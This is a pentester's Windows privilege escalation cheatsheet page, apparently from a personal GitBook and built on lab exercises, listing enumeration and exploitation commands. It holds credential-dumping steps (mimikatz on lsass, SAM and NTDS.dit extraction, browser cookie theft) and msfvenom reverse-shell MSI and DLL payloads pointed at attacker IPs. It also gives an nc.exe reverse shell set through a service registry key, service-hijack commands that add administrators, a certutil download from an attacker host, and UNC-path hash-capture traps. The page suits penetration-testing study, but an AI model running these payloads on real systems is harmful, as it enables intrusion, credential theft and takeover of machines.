Dado1513
  • Dado1513 Pentest Notes
  • Introduction & Documentation
  • Pentesting Methodologies
  • External Recon Pentesting
  • Brute Force
  • LotL - Living off the Land
  • Pivoting Tunnelling and Port Forward
  • Active Directory
    • 🛠️Active Directory Enumeration & Attacks
    • 🛠️ACL/ACE Abuse
    • 🛠️ADCS
    • Kerberos Attack Cheatsheet
  • Linux Pentesting
    • Linux Privilege Escalation
  • Windows Pentesting
    • Windows Privilege Escalation
  • Mobile Pentesting
    • 🛠️Android Application Pentesting
    • iOS Application Pentesting
  • Cloud Pentest
    • 🛠️Cloud Pentesting
  • Wireless Pentesting
    • 🛠️WiFi Pentesting
  • Web Pentesting
    • 🛠️XSS Cheatsheet
    • 🛠️SQL Injection
  • OSINT
    • Google Dorks
  • Network Services Pentest
    • Attacking Common Services
    • 🛠️139,445 SMB
    • 🛠️161,162,10161,10162- Pentesting SNMP
    • 🛠️winrm
  • Tools
    • NetExec
    • Chisel
    • bloodyAD
    • PowerView
    • Certipy
    • sqlmap
    • mimikatz
Powered by GitBook
On this page
  • Windows Privilege Escalation
  • Initial Enumeration
  • Pillaging
  • Windows User Privileges
  • Windows Groups Privileges
  • User Account Control
  • Weak Permission
  • Permissive Registry ACLs
  • Kernel Exploit
  • Vulnerable Services
  • Process Injection
  • LOLBAS
  • Scheduled Task
  • DLL Injection/Hijacking
  • Resources
  • Tools
  1. Windows Pentesting

Windows Privilege Escalation

Windows Privilege Escalation

Initial Enumeration

Searching File & Creds

Searching File

  • findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

  • dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*where /R C:\ user.txtwhere /R C:\ *.ini

  • Search only file name: findstr /SI /M "password" *.xml *.ini *.txt

  • Search file content CMD: findstr /si password *.xml *.ini *.txt *.config

  • Search file content PowerShell select-string -Path <path>*.txt -Pattern password

  • Search file extensionCMD where /R C:\ *.config

  • Search file extension PowerShell Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Interesting File/Directories

  • gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

  • Unattend.xml

  • Sticky notes C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

  • PowerShell history

    • (Get-PSReadLineOption).HistorySavePath

    • gc (Get-PSReadLineOption).HistorySavePath

    • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Powershell Command

  • Get-Credential API

    • Import-Clixml

    • `Export-Clixml

  • runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Saved Credentials

  • cmdkey /list

  • SharpChrome.exe logins /unprotect

  • Password Manager

    • Keepass -> kdbx -> keepass2jhon -> hashcat/jhon

  • Mail

    • MailSniper

  • Lazagne - lazagne.exe all -> https://github.com/AlessandroZ/LaZagne

  • SessionGopher - Import-Module .\SessionGopher.ps1 - Invoke-SessionGopher -Target WINLPE-SRV01

Clear-Text Password in the Registry

  • Windows Autologon - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

    • reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

    • If 1 is enabled

  • Putty - Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>

    • reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

Wifi Password

  • netsh wlan show profile

  • netsh wlan show profile name="Wifi" key=clear

VHDX/VMDK

  • Mount Linux

    • guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk

    • `guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1

  • Windows

    • Mount-VHD Mount-VHD

  • Resources

    • Extract VMDK

Misconfiguration

  • AlwaysInstallelevated

    • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    • Exploit Import-Module .\PowerUp.ps1 - Write-UserAddMSI

    • Generating MSI msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

    • Execute MSI msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

  • BypassUAC

    • Bypass-UAC - Bypass-UAC

Share with write permssion

  • SCF on a File Share

    • Icon on attacker machine UNC IconFile=\\10.10.14.3\share\legit.ico

    • Responder/Inveigh/InveighZero

    • hashcat -m 5600

  • Malicious lnk file - LnkBomb LnkBomb

    • $objShell = New-Object -ComObject WScript.Shell

    • $lnk = $objShell.CreateShortcut("C:\legit.lnk")

    • $lnk.TargetPath = "\\<attackerIP>\@pwn.png"

    • $lnk.WindowStyle = 1

    • $lnk.IconLocation = "%windir%\system32\shell32.dll, 3"

    • $lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."

    • $lnk.HotKey = "Ctrl+Alt+O"

    • $lnk.Save()

Process Monitor

  • procmon

while($true){  
	$process = Get-WmiObject Win32_Process | Select-Object CommandLine
	Start-Sleep 1  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
	Compare-Object -ReferenceObject $process -DifferenceObject $process2}

Network

  • ipconfig /all

  • ARP Table arp -a

  • Routing table route print

OS and Process

  • Info OS - Get-WmiObject Win32_OperatingSystem | select -Property *

  • Process tasklist /svc

  • Env variables set

  • Systeminfo systeminfo

  • Patches and Updates wmic qfe - Get-HotFix | ft -AutoSize

  • Installed programs wmic product get name - Get-WmiObject -Class Win32_Product | select Name, Version

  • Running Process netstat -ano

User and Groups

  • Logged-In user query user

  • Current User echo %USERNAME

  • Priv whoami /priv

  • Groups Information whoami /groups

  • All User net user

  • All grous net localgroup

  • Detail about a group net localgroup administrators

  • Pass policy net accounts

  • Local User Description

    • Get-LocalUser

  • Computer Description

    • Get-WmiObject -Class Win32_OperatingSystem | select Description

Enumerating Protection

  • Windows Defender Get-MpComputerStatus

  • AppLocker Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

  • Test AppLocker Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Named Pipe

  • NamedPipes

Pillaging

  • Installed applications

    • dir "C:\Program Files"

    • Using Registry Key

      • $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation

      • $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation

      • $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

  • Installed services

    • Websites

    • File Shares

    • Databases

    • Directory Services (such as Active Directory, Azure AD, etc.)

    • Name Servers

    • Deployment Services

    • Certificate Authority

    • Source Code Management Server

    • Virtualization

    • Messaging

    • Monitoring and Logging Systems

    • Backups

  • Sensitive Data

    • Keylogging

      • Clipboard - Invoke-Clipboard

    • Screen Capture

    • Network Traffic Capture

    • Previous Audit reports

  • User Information

    • History files, interesting documents (.doc/x,.xls/x,password./pass., etc)

    • Roles and Privileges

    • Web Browsers

      • Firefox %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release

        • copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

        • CookieExtractor CookieExtractor

      • Chrome

        • SharpChromium - SharpChromium

        • Fix copy for Invoke-SharpChromium copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"

        • InvokeSharpChromium - Invoke-SharpChromium

    • IM Clients

      • Slack/Teams

Windows User Privileges

SeImpersonate and SeAssignPrimaryToken

  • JuicyPotato

  • PrintSpoofer

  • RoguePotato

SeDebugPrivilege

  • procdump.exe -accepteula -ma lsass.exe lsass.dmp

  • mimikatz.exe

    • log

    • sekurlsa::minidump lsass.dmp

    • `sekurlsa::logonpasswords'

  • Exploit SYSTEM from child process

    • tasklist (get info about winlogon.exe)

    • psgetsys.ps1 .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe, "")

    • .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe, "")

SeTakeOwnershipPrivilege

  • Enable Privilge

    • Import-Module .\Enable-Privilege.ps1

  • \EnableAllTokenPrivs.ps1

  • Choosing Target File

    • Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

  • Checking File Ownership

    • cmd /c dir /q 'C:\\Department Shares\\Private\\IT'

  • Take Ownership

    • takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'

  • Modify FILE ACL

    • icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F

Windows Groups Privileges

Backup Operators

  • Enable Flag https://github.com/giuliano108/SeBackupPrivilege

  • Exploit

    • Import-Module .\SeBackupPrivilegeUtils.dll

    • Import-Module .\SeBackupPrivilegeCmdLets.dll

  • diskshadow.exe

    • DISKSHADOW> set verbose on

    • DISKSHADOW> set metadata C:\Windows\Temp\meta.cab

    • DISKSHADOW> set context clientaccessible

    • DISKSHADOW> set context persistent

    • DISKSHADOW> begin backup

    • DISKSHADOW> add volume C: alias cdrive

    • DISKSHADOW> create

    • DISKSHADOW> expose %cdrive% E:

    • DISKSHADOW> end backup

    • DISKSHADOW> exit

    • Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

  • reg save HKLM\\SYSTEM SYSTEM.SAV

    • reg save hklm\system C:\temp\system.hive

  • reg save HKLM\SAM SAM.SAV

    • reg save hklm\sam C:\temp\sam.hive

  • impacket-secretsdump -sam sam.hive -system system.hive LOCAL

  • Extracting Cred from NTDS.dit

    • Install-Module DSInternals -Force

    • Import-Module .\DSInternals.psd1

    • $key = Get-BootKey -SystemHivePath .\\SYSTEM # or system.sav dipende da come lo abbiamo salvato prima

    • Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

  • secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

  • robocopy /B E:\Windows\\NTDS .\ntds ntds.dit

Event Log Readers

  • net localgroup "Event Log Readers"

  • wevtutil qe Security /rd:true /f:text | Select-String "/user"

  • wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

DnsAdmins

  • Generate malicious dll

    • msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

  • Get info about group DNSAdmins

    • Get-ADGroupMember -Identity DnsAdmins

  • Change dll

    • dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll

  • Restart DNS Services (could be distruptive)

  • Get SID user

    • wmic useraccount where name="netadm" get sid

  • Check permission on DNSService

    • sc.exe sdshow DNS

Hyper-V Administrators

  • From Hyper-V Administrator to Domain Admins

Print Operators - SeLoadDriverPrivilege

  • whoami /priv

  • EnableSeLoadDriverPrivilege.cpp

    • Build cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

  • Capcom.sys

  • Add Reference Driver reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"

  • EnablePrivilges EnableSeLoadDriverPrivilege.exe

  • Verifiy Driver is Loaded .\DriverView.exe /stext drivers.txt - cat drivers.txt | Select-String -pattern Capcom

  • Use ExploitCapcom .\ExploitCapcom.exe

  • Use EoPLoadDriver

  • Clean reg delete HKCU\\System\\CurrentControlSet\\Capcom

Server Operators

  • Find Services that run in SYSTEM ad es., AppReadiness

    • sc qc AppReadiness

  • Check Permssion with PsService

    • `c:\Tools\PsService.exe security AppReadiness

  • Change binPath

    • sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

  • Start Service

    • sc start AppReadiness

User Account Control

  • Checking if UAC is enabled

    • REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

  • Checking UAC Level

    • REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

  • Checking Windows Version

    • [environment]::OSVersion.Version

  • Reviewing PATH

    • cmd /c echo %PATH%

  • UAC bypass

    • UACME - UACME

    • UAC Mocking dir - uac-bypass-by-mocking-trusted-directories

    • Bypass UAC - Bypass-UAC

Weak Permission

Permissive File System ACLs

  • Using Sharphound.exe audit for searching services modifiable ad es., SecurityService

  • Check permission

    • icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

  • Change executable

    • cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

  • Restart Services

    • sc start SecurityService

Weak Service Permissions

  • Run Sharphound.exe audit

  • Using accesschk for reviewing permission about services

    • accesschk.exe /accepteula -quvcw WindscribeService

  • Change binpath

    • sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

  • Stop service

    • sc stop WindscribeService

  • Restart

    • sc start WindscribeService

  • Reverting

    • sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"

    • sc start WindScribeService

Unquoted Services

  • Querying service sc qc SystemExplorerHelpService

  • Searching unquoted services wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Permissive Registry ACLs

  • Checking Weak Service ACLs in Registry

    • accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

  • Changing ImagePath with PowerShell

    • Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

  • Modifiable Registry Autorun Binary

    • Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

    • https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns

Kernel Exploit

  • List vuln windows: https://msrc.microsoft.com/update-guide/vulnerability

  • wmic qfe list brief

  • Watson: Watson

  • Wesng: wesng

Vulnerable Services

  • Enumerate installed programs

    • wmic product get name

  • Enumerate local ports

    • netstat -ano | findstr 6064

  • Enumerate Process ID

    • get-process -Id 3324

  • Enumerate Running Service

    • get-service | ? {$_.DisplayName -like 'Druva*'}

  • Modifying PowerShell Execution Policy

    • Set-ExecutionPolicy Bypass -Scope Process

Process Injection

LOLBAS

  • Collection

    • LOLBAS - LOLBAS

  • Transfer file

    • certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

  • Encodign File

    • certutil -encode file1 encodedfile

  • Decoding file

    • Certutil -decode encodedfile file2

  • Execute dll

    • rundll32.exe

Scheduled Task

  • Enumerating

    • schtasks /query /fo LIST /v

    • Get-ScheduledTask | select TaskName,State

DLL Injection/Hijacking

  • DLL injection

    • is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.

    • Execute an arbitrary DLL inside another process

      1. Locate the process to inject the malicious DLL CreateToolhelp32Snapshot, Process32First, Process32Next

      2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess

      3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory

      4. Create a thread in the process that will load the malicious DLL CreateRemoteThread, LoadLibrary

      5. Other functions to use: NTCreateThreadEx, RtlCreateUserThread

    • LoadLibrary

    • Manual Mapping

    • Resources

      • DLL Injection Hacktips - DLL Injection

      • IredTeam DLL Injection - IredTeam-DLL Injection

  • DLL Hijacking

    • DLL Hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.

      • DLL Replacement: replace a legitimate DLL with an evil DLL. Combined with DLL Proxying

      • DLL Search Order Hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL Ref -[Ref.]

      • Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.

      • DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local .Ref [Ref.]

      • WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often DLL side-loading. Ref - [Ref.]

      • Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.

    • Find Missing DLL

      • procmon → filter → Results contain not Found and → Paths end with .dll

    • To escalate privileges

      • Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.

      • Ensure write access is available for any directory in which the DLL will be searched for icacls “Path-To-Dir”

    • Tools

      • winpeas

      • powersploit

        • Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll

    • Resources

      • DLL Hijacking Hacktricks - DLL Hijacking

      • DLL Hijacking Prives - DLL Hijacking PrivEsc

      • Hacking dlls in windows - hijacking-dlls-in-windows

      • tcapt dll hijacking - tcapt-dll-hijacking

      • DLL Hijacking - DLL Hijacking

      • IPPSEC DLL Hijacking

  • DLL Reflective

    • Resources

      • Reflective DLL Injection: Reflective DLL Injection

  • DLL SideLoading

    • Resources

      • Dll sideloading proxying dll-sideloading-proxying

  • `DLL Proxying

    • Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.

    • Get RevShell (N.B. is very important arch used)

      • msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll

      • msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll

      • msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll

      • msfconsole -> use multi/handler

    • Write Code

      • DLL Write

  • How to compile dll

    • x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

    • x86: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

    • Link to Windows Sockets 2, necessary for rev shell i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared

    • Alternative use VisualStudio e C#

  • How to check DLL

    • rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll

    • rundll32.exe injection.dll,0

  • Tools

    • Procmon

    • Process Explorer

    • VisualStudio

Resources

  • Payload windows privesc

  • hacktricks

  • LOLBAS

Tools

  • WinPEAS

  • PowerUP

  • SharpUp

  • Seatbelt

  • JAWS -

  • SessionGopher

  • Watson -

  • Lazagne

  • MailSniper

  • wesng -

  • Sysinternal

  • SharpChrome

  • Snaffler

  • PSSQLite

  • DLL Export Viewer

  • Responder

  • Inveigh

  • InveighZero

  • SharpChromium

PreviousLinux Privilege EscalationNextAndroid Application Pentesting

Last updated 24 days ago